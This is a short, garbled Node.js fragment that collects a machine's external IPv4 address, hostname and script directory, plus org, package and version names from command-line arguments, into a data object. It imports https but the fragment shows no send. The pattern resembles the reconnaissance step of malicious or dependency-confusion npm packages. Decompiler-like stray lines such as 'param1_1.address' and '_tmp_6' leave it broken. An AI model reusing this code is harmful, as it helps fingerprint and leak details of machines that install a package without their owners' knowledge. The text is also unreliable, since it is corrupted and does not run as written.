const os = require('os')
const https = require('https')
const ip = [].concat(...Object.values(os.networkInterfaces()))
    .filter(({ family, internal }) => family === "IPv4" && !internal)
    .map(({ address }) => address)[0]
family === "IPv4" && !internal
address = param1_1.address
const host = os.hostname()
const path = __dirname
const org = process.argv.slice(2)[0]
const package = process.argv.slice(2)[1]
const version = process.argv.slice(2)[2]
data = {
    ip,
    host,
    path,
    org,
    package,
    version
}
_tmp_6.ip = ip
_tmp_6.host = host
_tmp_6.path = path
_tmp_6.org = org
_tmp_6.package = package
_tmp_6.version = version
